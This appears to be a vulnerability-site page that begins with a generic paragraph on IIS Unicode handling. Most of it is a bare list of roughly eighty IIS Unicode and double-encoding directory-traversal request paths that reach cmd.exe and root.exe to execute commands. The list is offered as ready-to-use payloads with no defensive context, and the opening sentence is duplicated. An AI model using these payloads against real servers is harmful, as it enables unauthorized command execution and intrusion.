IIS leverages Unicode strings to support a globalized web, enabling IIS leverages Unicode strings to support a globalized web, enabling applications to handle diverse languages and character sets beyond basic ASCII. This is critical for processing URLs, file paths, HTTP headers, and configuration settings that contain non-English characters (e.g., Chinese, Arabic, Cyrillic).
Internally, IIS and the Windows operating system primarily operate with UTF-16 (wide characters). However, for web communication, IIS often expects and processes incoming HTTP requests using UTF-8 encoding, especially for URL paths and query strings.
This ensures that web applications hosted on IIS can correctly interpret, display, and store data from users worldwide without character corruption. Developers must ensure their applications and database connections also consistently use Unicode (preferably UTF-8 for web interactions) to maintain end-to-end integrity. It's fundamental for building truly internationalized web solutions.
#Some of unicodes ...
#collected by cd
#http://bastardo.de/ (apache ;))
/MSADC/root.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
IIS Unicode Strings
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 41
